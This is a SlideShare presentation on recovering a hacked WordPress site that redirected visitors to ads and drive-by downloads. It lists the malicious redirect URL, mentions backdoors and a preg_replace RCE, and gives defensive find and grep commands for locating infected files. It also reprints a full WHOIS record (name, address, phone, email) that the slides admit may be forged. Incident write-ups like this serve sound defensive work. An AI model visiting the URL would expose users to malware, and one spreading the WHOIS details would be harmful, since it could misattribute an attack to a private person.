Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Securing hacked website // Malware infected website filled with backdoors

414 views

Published on

This is a short presentation on how we encountered hacked website, various countermeasures we took to take website back from malware, and applied Wordfence and Cloudflare protection.

Published in: Internet
  • Be the first to comment

  • Be the first to like this

Securing hacked website // Malware infected website filled with backdoors

  1. 1. Securing hacked website last week incident
  2. 2. What happened? Richard, a grad student notified that there's an issue with one website (http://www.bnaijacobjc.com/) , and he received credentials next day from the owner of the website, so we can help them fix it. Basically, anyone searching for this website from Google or any backlinking to this website, were being redirected to Drive-By Attack, Video websites, Advertisements, etc by malicious script injected in website. And we fixed it finally after numerous countermeasures!
  3. 3. Multiple Issues Theme with malicious JS to redirect users for advertisement (http://portal-b.pw/XcTyTp) ^ NSFW: redirects to Drive-By downloads, Advertisements, Pron* Old Wordpress Version ● Found Multiple Backdoors, which can be used by an attacker to regain access Exploited RCE vulnerability in preg_replace function in PHP
  4. 4. Fixes / Countermeasures Identified, ordered recently changed files and removed malicious files Listing files modified in last 3 days $ find . -mtime -3 Updated Wordpress and installed Security Scanner plugins Acunetix Secure WordPress Wordfence Security Analyzed Traffic pattern through Chrome Developer Tools Throttled Network Traffic to Check multiple Redirects Identified backdoor in one of the theme and removed it $ grep -nri "_wp_http_referer" . $ grep -nri "portal-b.pw" .
  5. 5. Infrastructure/Access Level Used for fixes: GoDaddy Hosting with cPanel phpMyAdmin (DB access) to reset wp-admin credentials SSH access to execute CLI commands (Linux)
  6. 6. Some gatherings about attacker // Appears to be using pseudonym ● portal-b.pw domain used to circulate advertisement of all kind. WHOIS on domain revealed someone in RU (could be forged information) ID: C97505165-CNIC Name: Dzhamaldin Budunov Organization: Private Person Street: molodezhnaya 16/2 City: s. Sokur State/Province: Saratovskaya oblast Postal Code: 421994 Country: RU Phone: +7.9192930122 Email: ovodnevay@rambler.ru
  7. 7. Questions ?! By Mayur Pipaliya (mpipaliya) at Cyber Security Center, SPU / Nov’16

×